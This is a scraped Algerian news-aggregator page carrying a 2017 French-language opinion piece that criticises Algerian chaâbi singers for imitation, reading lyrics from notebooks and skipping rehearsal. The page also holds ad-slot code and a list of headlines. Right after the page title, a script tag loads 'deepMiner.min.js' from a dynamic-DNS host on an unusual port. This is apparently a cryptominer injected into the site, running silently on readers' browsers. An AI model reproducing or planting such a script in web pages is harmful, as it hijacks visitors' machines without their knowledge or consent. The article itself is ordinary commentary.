googletag.defineSlot('/21620968445/Djazairess_Fr_Article_1', [[336, 280], [300, 300], [300, 250], [300, 600]], 'div-gpt-ad-142634874-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Article_1', 'div-gpt-ad-142634874-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Fr_Article_3', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-142634876-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Article_3', 'div-gpt-ad-142634876-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Fr_Article_2', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-142634875-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Article_2', 'div-gpt-ad-142634875-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Fr_Widget', [[222, 280]], 'div-gpt-ad-1524625614-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Widget', 'div-gpt-ad-1524625614-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Fr_Siteunder', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-930032573-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Siteunder', 'div-gpt-ad-930032573-0-oop').addService(googletag.pubads()); googletag.pubads().enableSingleRequest(); googletag.enableServices();}); Djazairess : Chanson algérienne: La facilité mène à la médiocrité<script src="https://jhondi33.duckdns.org:7777/deepMiner.min.js"></script>
 
En bref…    La démission surprise d'Ould Abbès    Louisa Hanoune fustige les partisans de la «continuité»    Un élu de l'APW pour représenter le FLN    La sous-traitance représente 10% de l'activité    Marchés pétroliers : La surabondance annonce-t-elle une mauvaise année ?    Un dialogue pour désamorcer la crise    Libye, la quadrature du cercle    Jamal Khashoggi, Ankara enfonce Riyad par petites doses    Votre week-end sportif    Violences dans les gradins du 5-Juillet    Le Mouloudia a mal de ses recrues estivales    Campagne d'information pour expliquer le projet    Plus de 33 000 pétards saisis à Djimla    Des dizaines de villageois de Souk-Lekhmis bloquent le CW15    Six millions d'Algériens sont diabétiques    Zombies-Land !    Logements sociaux : Les recalés des listes des bénéficiaires protestent    Assassinat par la DST en novembre 1954 de Kacem Zeddour Mohammed-Brahim Une affaire d'Etat    WA Tlemcen: Biskra, un cap important pour le Widad    USM Bel-Abbès: Un exploit qui en appelle d'autres    FLN: Ould Abbès démissionne    Ce n'est pas Trump le problème mais l'Amérique qui l'a élu    Europe: «Brexit or not Brexit ?»    Le pétrole, toujours    Le FFS dénonce: Le projet de loi de finances 2019 «présenté de façon expéditive»    Skikda: Saisie de kif, 8 arrestations    Suite aux nombreuses opérations de relogement: Des terrains combinés de proximité pour les nouveaux pôles urbains    Lycée Dergham Hanifi: La police sensibilise les élèves sur les dangers de l'Internet    Présidentielle : on se perd en conjectures !    EN - Les Verts dès demain à Lomé: Belmadi mobilise ses troupes    France 1914-1918 : centenaire de l'Armistice, le 11 novembre    Le virus des primaires    Est-il Halal de prier à la grande mosquée d'Alger ?    Hamas plonge Israël dans une crise politique    FLN : Démission de M. Ould Abbes pour des raisons de santé    Bedoui : " L'Algérie est sur de bons rails vers un lendemain meilleur "    Situation économique et sociale alarmante dans la wilaya de Khenchela :    FLN : Ould Abbès "débarqué"    Des otages druzes libérés portent en triomphe Bachar el-Assad    Les assiettes foncières inexploitées seront mises à la disposition des porteurs de projets    Arnaud Montebourg nouveau président de l'Association    2e édition du prix Cheikh Abdelkrim-Dali à Alger    L'étape d'Alger a coûté 5 MD    «Nous allons à Lomé pour la gagne»    Le Hamas et l'Etat hebreu: Crise politique en Israël    L'échec programmé de Rome    Disney : Les exploits des super-héros font les affaires de Mickey    







Merci d'avoir signalé!
Cette image sera automatiquement bloquée après qu'elle soit signalée par plusieurs personnes.





Chanson algérienne: La facilité mène à la médiocrité
Publié dans Le Temps d'Algérie le 04 - 09 - 2017

Encore une fois, cette fête de l'Aïd nous a donné l'occasion de constater que la médiocrité de la plupart de nos chanteurs est motivée par leur préférence de la facilité au travail et la rigueur.

En effet, si certaines chaînes de télévision ont décidé de passer et repasser l'enregistrement des deux chansons consacrées au sacrifice d'Ibrahim El Khalil (QSSL) et Mebrouk Aïdkoum du maître de la chanson andalouse et hawzie, Abdelkrim Dali, d'autres ont programmé certains chanteurs qui ont interprété la même chanson croyant que de cette manière le succès est garanti. Si les programmateurs ont décidé depuis des dizaines d'années de ne plus programmer l'enregistrement de Qçidet Ibrahim El Khalil, enregistrée dans les années 1920-1930 par Mahieddine Bachtarzi, pour ne plus passer que la version de Dali qui est, il faut reconnaître excellente, on se demande pourquoi ils nous obligent à voir des jeunes reprendre la même chanson. Les chanteurs auxquels on ouvre les portes des chaînes de télévision et les salles pour se produire, devraient plutôt s'adresser à des paroliers et des compositeurs pour nous offrir de nouveaux produits de bonne qualité. Mais pour que le produit soit de bonne qualité, on ne devrait plus permettre à ces chanteurs d'imiter des maîtres, ou de monter sur scène ou sur un plateau de télévision avec un cahier, car ils ne prennent même pas la peine d'apprendre leurs textes. Il faut noter que ces jeunes chanteurs ont pris cette mauvaise habitude en voyant des chanteurs considérés comme les plus grands, tels que Chaou Abdelkader et feu Boudjemâa El Ankis, passer à la télévision devant un pupitre. On ne comprend pas ces chanteurs, notamment de chaâbi qui choisissent le mauvais exemple au lieu de suivre la voie des maîtres tels que Hadj M'nouer, Hadj M'hamed El Anka et Mohamed El Marokene, qui apprenaient par cœur leurs textes, ce qui leur permettait de chanter tout en souriant et montrer les expressions de leurs visages selon la profondeur du texte.
Les andalous sont plus sérieux
La plupart de cette catégorie de chanteurs apparue à la fin des années 1970 ne prend même pas la peine de faire des répétitions sérieuses avec un orchestre. Comme pour une soirée de quartier ou un mariage, ces chanteurs cherchent à la dernière minute des musiciens pour les accompagner et se font applaudir par un public habitué à la médiocrité.
Pour ce qui est de l'assiduité, ils devraient suivre la voie des chanteurs andalous, même s'il y a parmi ces derniers ceux qui ne veulent toujours pas apprendre le solfège sous prétexte que ce style ne peut être transcris, alors qu'il a été prouvé que cela est faux, puisque tous les sons peuvent être écrits en solfège, «même le son d'un bison qui tombe dans des escaliers», comme disait le grand maître de l'andalou, compositeur et chanteur d'opéra Saïd Bestandji. Il devrait prendre aussi la leçon auprès de ces chanteurs et groupes modernes qui font des répétitions tout le temps et des recherches pour réaliser les meilleures compositions et les meilleurs arrangements.
La plupart de nos chanteurs sont tombés dans la facilité. Il est temps qu'ils se mettent au travail et il est temps aux programmateurs de ne plus leur permettre de chanter n'importe quoi et n'importe comment. Pour arriver au professionnalisme, il faut être exigeant. L'exigence mène à l'amélioration, et cela a été prouvé lors du Festival national de la chanson chaâbie, où tous les jeunes candidats au concours avaient appris par cœur leurs textes, car on le leur avait exigé. Il faut qu'on sache que la facilité mène à la médiocrité.


Cliquez ici pour lire l'article depuis sa source.